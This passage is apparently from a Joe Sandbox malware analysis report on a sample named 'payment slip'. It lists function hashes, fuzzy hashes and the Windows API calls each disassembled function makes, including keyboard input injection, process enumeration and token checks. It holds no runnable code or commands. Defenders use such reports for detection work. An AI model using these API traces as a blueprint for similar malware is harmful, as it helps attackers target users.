                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume
                                        • String ID: %lu
                                        • API String ID: 2507767853-685833217
                                        • Opcode ID: 475c3dc51b631d7bdff0734be260a8da3bcf59f6acbeae26af14312950e290c6
                                        • Instruction ID: 57507fe0cacb4307998c63ad4f6938863bfe114f42313bf142506e0b2eab8307
                                        • Opcode Fuzzy Hash: 475c3dc51b631d7bdff0734be260a8da3bcf59f6acbeae26af14312950e290c6
                                        • Instruction Fuzzy Hash: 7E317175A00109AFDB10DF94C885EAEBBF8EF49308F1480A9F909DB252DB75ED45CB61
                                        APIs
                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 000C424F
                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 000C4264
                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 000C4271
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: msctls_trackbar32
                                        • API String ID: 3850602802-1010561917
                                        • Opcode ID: 7f236933805ca5c63818d579f17229aac67eb5546e16ac10772908994ac3816f
                                        • Instruction ID: d8d699cca7211d41a32070363a306f84b08afe3b72ba0e8eae73ad57ad30cbb4
                                        • Opcode Fuzzy Hash: 7f236933805ca5c63818d579f17229aac67eb5546e16ac10772908994ac3816f
                                        • Instruction Fuzzy Hash: 0911E331240208BEEF215F68CC06FAB3BACFF85B54F014118FA55E6090D271D8519B10
                                        APIs
                                          • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                          • Part of subcall function 00092DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00092DC5
                                          • Part of subcall function 00092DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00092DD6
                                          • Part of subcall function 00092DA7: GetCurrentThreadId.KERNEL32 ref: 00092DDD
                                          • Part of subcall function 00092DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00092DE4
                                        • GetFocus.USER32 ref: 00092F78
                                          • Part of subcall function 00092DEE: GetParent.USER32(00000000), ref: 00092DF9
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00092FC3
                                        • EnumChildWindows.USER32(?,0009303B), ref: 00092FEB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                        • String ID: %s%d
                                        • API String ID: 1272988791-1110647743
                                        • Opcode ID: 29d7ccab83c22bb2361c8790605768ee7dc15a68e1e6abb28fe670a9ec5572b5
                                        • Instruction ID: 523073459d68a937e0de85b4852e807761efe5cce3e414993ebaf56ad49c1516
                                        • Opcode Fuzzy Hash: 29d7ccab83c22bb2361c8790605768ee7dc15a68e1e6abb28fe670a9ec5572b5
                                        • Instruction Fuzzy Hash: 8F11B171600205ABDF557F70CC99EEE77AAAF84304F048075FA099B293DF319949AF60
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 000C58C1
                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 000C58EE
                                        • DrawMenuBar.USER32(?), ref: 000C58FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Menu$InfoItem$Draw
                                        • String ID: 0
                                        • API String ID: 3227129158-4108050209
                                        • Opcode ID: c5fc48cfbe12d6d57ac2b4b91296e7144e3a2ab9913275487860dd316f1a1d10
                                        • Instruction ID: be69ffd3be8a444052006dab63c08155f640a38589d7239bf7af95f98792f77c
                                        • Opcode Fuzzy Hash: c5fc48cfbe12d6d57ac2b4b91296e7144e3a2ab9913275487860dd316f1a1d10
                                        • Instruction Fuzzy Hash: C4016D75500218EFEB619F11DC44FAFBBB8FB45362F1080A9E849D6151DB349AC4DF21
                                        APIs
                                        • GetForegroundWindow.USER32(?,001018B0,000CA364,000000FC,?,00000000,00000000,?,?,?,000876CF,?,?,?,?,?), ref: 000C7805
                                        • GetFocus.USER32 ref: 000C780D
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                          • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                        • SendMessageW.USER32(00E1E670,000000B0,000001BC,000001C0), ref: 000C787A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Long$FocusForegroundMessageSend
                                        • String ID: U
                                        • API String ID: 3601265619-2399391058
                                        • Opcode ID: 0fad48d8d49b34b24b780c50680be0cfab661d6dd8b508db3fe4bb872dc7beab
                                        • Instruction ID: cc070df4660c0822a1760de2645c1cd74262520300cd4f74fa1c4985223c8411
                                        • Opcode Fuzzy Hash: 0fad48d8d49b34b24b780c50680be0cfab661d6dd8b508db3fe4bb872dc7beab
                                        • Instruction Fuzzy Hash: 12018F316051009FE329DB28D858FBA33E6EF8A324F18026DE159872E1CB356C46CF81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fbfa8731ded7a8ca3392ab0e415ac7d10abb87236b7e171d5c46a51868ab7f4c
                                        • Instruction ID: 0d85e05ee286b1fa357207e2934b065315db61cefeb2533adf6f420106fd87f2
                                        • Opcode Fuzzy Hash: fbfa8731ded7a8ca3392ab0e415ac7d10abb87236b7e171d5c46a51868ab7f4c
                                        • Instruction Fuzzy Hash: 38C12C75A00216EFDB14CFA4C894EAEB7B9FF48704F208598E905EB251D731EE41EB90
                                        APIs
                                        Similarity
                                        • API ID: Variant$ClearInitInitializeUninitialize
                                        • String ID:
                                        • API String ID: 1998397398-0
                                        • Opcode ID: 601043f3babd834bc5147f04c73fbf2e8ca1c41153f242128ad644f86a0d5e19
                                        • Instruction ID: 2a8f2c2791c7c124f814e4117f6a09aa34eb26c5ffeb50fd4a44948f24a7165f
                                        • Opcode Fuzzy Hash: 601043f3babd834bc5147f04c73fbf2e8ca1c41153f242128ad644f86a0d5e19
                                        • Instruction Fuzzy Hash: 12A16B756047009FCB15DF28C485EAAB7E9FF88714F148859F98A9B362DB70EE01CB91
                                        APIs
                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,000CFC08,?), ref: 000905F0
                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,000CFC08,?), ref: 00090608
                                        • CLSIDFromProgID.OLE32(?,?,00000000,000CCC40,000000FF,?,00000000,00000800,00000000,?,000CFC08,?), ref: 0009062D
                                        • _memcmp.LIBVCRUNTIME ref: 0009064E
                                        Similarity
                                        • API ID: FromProg$FreeTask_memcmp
                                        • String ID:
                                        • API String ID: 314563124-0
                                        • Opcode ID: f7ba5d67824fc699400f58f5ad11c23c5c19d667c737bd098620ed78c0a1d287
                                        • Instruction ID: 2d31c36415d8ce80d66d2b699a607ebf44a1fee05075cac0e18ac6178039e8d6
                                        • Opcode Fuzzy Hash: f7ba5d67824fc699400f58f5ad11c23c5c19d667c737bd098620ed78c0a1d287
                                        • Instruction Fuzzy Hash: 6281F671A00109EFCF04DF94C988EEEB7B9FF89315F204598E516AB250DB71AE06DB60
                                        APIs
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 383bb29c883ced643d7462ac278eb4f73ef0357fbffa8fc016c27940bf02bf8c
                                        • Instruction ID: ccc4f12569830c1e2373e1118de8637cdcf02bd5cf356ba5651a44c485707e82
                                        • Opcode Fuzzy Hash: 383bb29c883ced643d7462ac278eb4f73ef0357fbffa8fc016c27940bf02bf8c
                                        • Instruction Fuzzy Hash: CA414871E00501ABDB356BBC8C46AFE3AE5EF41370F248225F81DD32D3EA3C89415266
                                        APIs
                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 000B1AFD
                                        • WSAGetLastError.WSOCK32 ref: 000B1B0B
                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 000B1B8A
                                        • WSAGetLastError.WSOCK32 ref: 000B1B94
                                        Similarity
                                        • API ID: ErrorLast$socket
                                        • String ID:
                                        • API String ID: 1881357543-0
                                        • Opcode ID: 240546d734cd3f75508afdc71f2e04d158f5b180d7e9cc6296c17d9946074e7f
                                        • Instruction ID: 9ca24553d255b019ba9f5cb59a98beb737b2e6ae54404a02a665defd4d0b7956
                                        • Opcode Fuzzy Hash: 240546d734cd3f75508afdc71f2e04d158f5b180d7e9cc6296c17d9946074e7f
                                        • Instruction Fuzzy Hash: 4341B1746002006FE720AF24C886FAA77E5EB44718F948458FA1A9F3D3D772DD418B90
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7bea6a918cfcca3bfed806a33a993de92fe72bf0bafb5040aa2562c926fb6cd6
                                        • Instruction ID: f84582c5a524341afeb7efa5a6551d9c75ebc2360e0ecbf56e022dd05fe19161
                                        • Opcode Fuzzy Hash: 7bea6a918cfcca3bfed806a33a993de92fe72bf0bafb5040aa2562c926fb6cd6
                                        • Instruction Fuzzy Hash: 074119B1A00714BFD724AF38CC41BEABBEAEF84710F10852AF556DB2D2D77599418790
                                        APIs
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 000A5783
                                        • GetLastError.KERNEL32(?,00000000), ref: 000A57A9
                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 000A57CE
                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 000A57FA
                                        Similarity
                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                        • String ID:
                                        • API String ID: 3321077145-0
                                        • Opcode ID: 11ff9685375bbcc58648b2a2a1d8bc87bbfbfaa8a464170bfb97f625748ce81f
                                        • Instruction ID: 4f0ac46ae9fbf4ffc90e43080fd5970aabd977cc971a3731da5a5fe88a8ae643
                                        • Opcode Fuzzy Hash: 11ff9685375bbcc58648b2a2a1d8bc87bbfbfaa8a464170bfb97f625748ce81f
                                        • Instruction Fuzzy Hash: 07413E39600A10DFDB25DF55C444A5DBBE5FF49321F188488E84AAB362CB74FD01CB91
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00056D71,00000000,00000000,000582D9,?,000582D9,?,00000001,00056D71,8BE85006,00000001,000582D9,000582D9), ref: 0006D910
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0006D999
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0006D9AB
                                        • __freea.LIBCMT ref: 0006D9B4
                                          • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: 20b6e46a375e418717ab47178804057c03b636f841cfb45c7a75ceedcb7fc7a2
                                        • Instruction ID: 9bff75bbb65425934817ff584f8020d5da37f28b04ecf4eb17eb4ac2e3a08b6f
                                        • Opcode Fuzzy Hash: 20b6e46a375e418717ab47178804057c03b636f841cfb45c7a75ceedcb7fc7a2
                                        • Instruction Fuzzy Hash: 0031AD72A0020AABEF259F65DC45EEF7BA6EB41310B05416AFC08D7291EB35CD54CBA0
                                        APIs
                                        • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 0009ABF1
                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0009AC0D
                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 0009AC74
                                        • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 0009ACC6
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: 2f193df8491f5a4c238148f864e434510fce631da61cfc06de156d7250baf388
                                        • Instruction ID: 2c3ec746e1f28ab5756165947c12a4314cf1ba7882c4f6a084e9368e193ec3d2
                                        • Opcode Fuzzy Hash: 2f193df8491f5a4c238148f864e434510fce631da61cfc06de156d7250baf388
                                        • Instruction Fuzzy Hash: 6A3106B0B046186FFF35CB65CC04BFE7BE5AB8A321F04461AE4859A1D1C3798985A7D2
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 000C16EB
                                          • Part of subcall function 00093A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00093A57
                                          • Part of subcall function 00093A3D: GetCurrentThreadId.KERNEL32 ref: 00093A5E
                                          • Part of subcall function 00093A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000925B3), ref: 00093A65
                                        • GetCaretPos.USER32(?), ref: 000C16FF
                                        • ClientToScreen.USER32(00000000,?), ref: 000C174C
                                        • GetForegroundWindow.USER32 ref: 000C1752
                                        Similarity
                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                        • String ID:
                                        • API String ID: 2759813231-0
                                        • Opcode ID: 45978b0a0f60b25fd3efcfe7a2bbe72a10113a11e4e6a8d139c6a3545d52fd8a
                                        • Instruction ID: bc3ab090f351f151e8d7821f02604cd360b918b05cb1d28ee6586bdd5cc126f6
                                        • Opcode Fuzzy Hash: 45978b0a0f60b25fd3efcfe7a2bbe72a10113a11e4e6a8d139c6a3545d52fd8a
                                        • Instruction Fuzzy Hash: 22315E75D04249AFDB04EFA9C881DEEBBFDEF49304B5080A9E419E7212D6319E45CFA0
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0009D501
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0009D50F
                                        • Process32NextW.KERNEL32(00000000,?), ref: 0009D52F
                                        • CloseHandle.KERNEL32(00000000), ref: 0009D5DC
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 51951799635ff8697bc8517e48d801fcd5b04a4b2bb474bd19cd99273c43abe9
                                        • Instruction ID: d0d3072cf855d5879fce946656e465ba494c6f3fa5ec470c84509812d43f047b
                                        • Opcode Fuzzy Hash: 51951799635ff8697bc8517e48d801fcd5b04a4b2bb474bd19cd99273c43abe9
                                        • Instruction Fuzzy Hash: 2731A4711083009FD701EF54C881EAFBBF8EFD9354F54092DF585861A2EB719945CB92
                                        APIs
                                        • GetFileAttributesW.KERNEL32(?,000CCB68), ref: 0009D2FB
                                        • GetLastError.KERNEL32 ref: 0009D30A
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0009D319
                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,000CCB68), ref: 0009D376
                                        Similarity
                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                        • String ID:
                                        • API String ID: 2267087916-0
                                        • Opcode ID: 0d43c37b0eda9e6b3d6f35f28eead766cee2030fb2efa15efb2f06a314d8812f
                                        • Instruction ID: 3514d33584b73f11b46aea954a1fd1f59d59fb59b1af040dc19ec16f4125f7f0
                                        • Opcode Fuzzy Hash: 0d43c37b0eda9e6b3d6f35f28eead766cee2030fb2efa15efb2f06a314d8812f
                                        • Instruction Fuzzy Hash: E121A370548201DF9B10DF24C8818AE77E8EF55365F508A1EF499C72A2DB30DA46DB93
                                        APIs
                                          • Part of subcall function 00091014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0009102A
                                          • Part of subcall function 00091014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00091036
                                          • Part of subcall function 00091014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091045
                                          • Part of subcall function 00091014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0009104C
                                          • Part of subcall function 00091014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091062
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 000915BE
                                        • _memcmp.LIBVCRUNTIME ref: 000915E1
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00091617
                                        • HeapFree.KERNEL32(00000000), ref: 0009161E
                                        Similarity
                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                        • String ID:
                                        • API String ID: 1592001646-0
                                        • Opcode ID: e29a44cf82c6553f8ce4fa7ca65fe5347da4b050ddecbb8f5df33308d8d2b558
                                        • Instruction ID: 9127330d878047bf95791e07e9383d4ef5514a538536e009921ca6a5a8336c11
                                        • Opcode Fuzzy Hash: e29a44cf82c6553f8ce4fa7ca65fe5347da4b050ddecbb8f5df33308d8d2b558
                                        • Instruction Fuzzy Hash: 5F218C31E4410AEFEF00DFA4C949BEEB7F8EF44344F194459E445AB241E774AA05EBA0
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 000C280A
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000C2824
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000C2832
                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 000C2840
                                        Similarity
                                        • API ID: Window$Long$AttributesLayered
                                        • String ID:
                                        • API String ID: 2169480361-0
                                        • Opcode ID: 3369e3992b17e2cc2f57bac3b36a087ab1d6a3df3f9cfde11ca5d918f06fac6e
                                        • Instruction ID: fd27a1d20b364e05cb875fa24d24a7aa4276b9f576eb43986e30a712551f43ed
                                        • Opcode Fuzzy Hash: 3369e3992b17e2cc2f57bac3b36a087ab1d6a3df3f9cfde11ca5d918f06fac6e
                                        • Instruction Fuzzy Hash: 0C21D631209511AFE714DB24C844FAE7799AF45324F14825CF41ACBAE2CB75FC82C790
                                        APIs
                                          • Part of subcall function 00098D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0009790A,?,000000FF,?,00098754,00000000,?,0000001C,?,?), ref: 00098D8C
                                          • Part of subcall function 00098D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00098DB2
                                          • Part of subcall function 00098D7D: lstrcmpiW.KERNEL32(00000000,?,0009790A,?,000000FF,?,00098754,00000000,?,0000001C,?,?), ref: 00098DE3
                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00098754,00000000,?,0000001C,?,?,00000000), ref: 00097923
                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00097949
                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00098754,00000000,?,0000001C,?,?,00000000), ref: 00097984
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpylstrlen
                                        • String ID: cdecl
                                        • API String ID: 4031866154-3896280584
                                        • Opcode ID: 3dc7ed71af7550990f90fd41bcfe119e70374c646504b47ef69ff0dedea8f878
                                        • Instruction ID: bad0bdd28ddc465f64428c6573750e1f4c3cb7f67ce4bc9b04aa661c993438ef
                                        • Opcode Fuzzy Hash: 3dc7ed71af7550990f90fd41bcfe119e70374c646504b47ef69ff0dedea8f878
                                        • Instruction Fuzzy Hash: 4011067A210202AFDF159F35D844E7B77E5FF85350B10402AF90ACB265EF319801D751
                                        APIs
                                        • GetWindowLongW.USER32(?,000000F0), ref: 000C7D0B
                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 000C7D2A
                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 000C7D42
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,000AB7AD,00000000), ref: 000C7D6B
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID:
                                        • API String ID: 847901565-0
                                        • Opcode ID: 03274e1cd506667f71c37d26ef17afe7ebafdf5b0fbeeaaff4a4205c533c57a1
                                        • Instruction ID: d18f42daa83608d3fb6f8deaae32a9aa29d9d8e9e1bfee3073adf5dc6d59e548
                                        • Opcode Fuzzy Hash: 03274e1cd506667f71c37d26ef17afe7ebafdf5b0fbeeaaff4a4205c533c57a1
                                        • Instruction Fuzzy Hash: 09118932604615AFDB149F28DC04EAA3BA5AF45364F158728F83ADB2F0E7349990CB90
                                        APIs
                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 000C56BB
                                        • _wcslen.LIBCMT ref: 000C56CD
                                        • _wcslen.LIBCMT ref: 000C56D8
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 000C5816
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend_wcslen
                                        • String ID:
                                        • API String ID: 455545452-0
                                        • Opcode ID: 52894040982c83a0b15a0e5ea4b329c87935aa45111c4aed1466b2a589016c0a
                                        • Instruction ID: ebd390d279b93f4e9926893f4898db91cc24a28c6b8af326aac0d07028e57c2c
                                        • Opcode Fuzzy Hash: 52894040982c83a0b15a0e5ea4b329c87935aa45111c4aed1466b2a589016c0a
                                        • Instruction Fuzzy Hash: 3711D379600608A6DF209F65CC85FEF77ACEF1176AB10416EF915D6081EB74EAC4CB60
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00091A47
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00091A59
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00091A6F
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00091A8A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 0b87709dc3f367d965909c3a5461180eecfb64cd43e87c35d5d8c90233f44167
                                        • Instruction ID: 5f49610bfb2376e4b64e7e4bb921e42679018f4294808924b211485280e19925
                                        • Opcode Fuzzy Hash: 0b87709dc3f367d965909c3a5461180eecfb64cd43e87c35d5d8c90233f44167
                                        • Instruction Fuzzy Hash: 7411FA3AE01219FFEF119BA5C985FEDBB78EB04750F200091E604B7290D6716E50EB94
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 0009E1FD
                                        • MessageBoxW.USER32(?,?,?,?), ref: 0009E230
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0009E246
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0009E24D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
